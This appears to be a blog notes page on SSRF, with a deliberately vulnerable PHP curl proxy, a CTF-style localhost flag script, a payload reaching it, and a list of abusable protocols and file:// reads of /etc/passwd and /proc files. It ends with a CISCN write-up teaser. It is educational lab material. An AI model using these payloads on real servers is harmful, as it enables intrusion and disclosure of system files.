Notes Site.

Server-Side Request Forgery (SSRF)

post @ 2024-01-29

example

# index.php
<?php
highlight_file(__FILE__);
function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
    $result=curl_exec($ch);
    curl_close($ch);
    echo $result;
}
$url = $_GET['url'];
curl($url);

# ssrf.php
<?php
$ip = $_SERVER["REMOTE_ADDR"];
if($ip === "127.0.0.1"){
	if($_GET["passwd"] === "adminTrue"){
		readfile("/flag");
	}
	else{
		echo "no";
	}
}else{
	echo "not 127.0.0.1";
}

payload

1 2	?url=http://127.0.0.1/ssrf.php?passwd=adminTrue ...

利用协议

file://
dict://
gopher://
ftp://
sftp://
ldap://
tftp://
...

file://

file://
file:///etc/passwd
file:///etc/hosts
file:///proc/net/arp
file:///proc/net/fib_trie
...

2023CISCN初赛

post @ 2024-01-20

2023CISCN初赛

Unzip

题型：文件上传（软连接）

点击上传，跳转到upload.php，高亮源码

软连接

依次上传 1.zip、2.zip

Prev Home Next

n2ryx's Blog|

Server-Side Request Forgery (SSRF)

利用协议

2023CISCN初赛

2023CISCN初赛

Unzip

Categories

Tag Cloud

Recent Posts

Links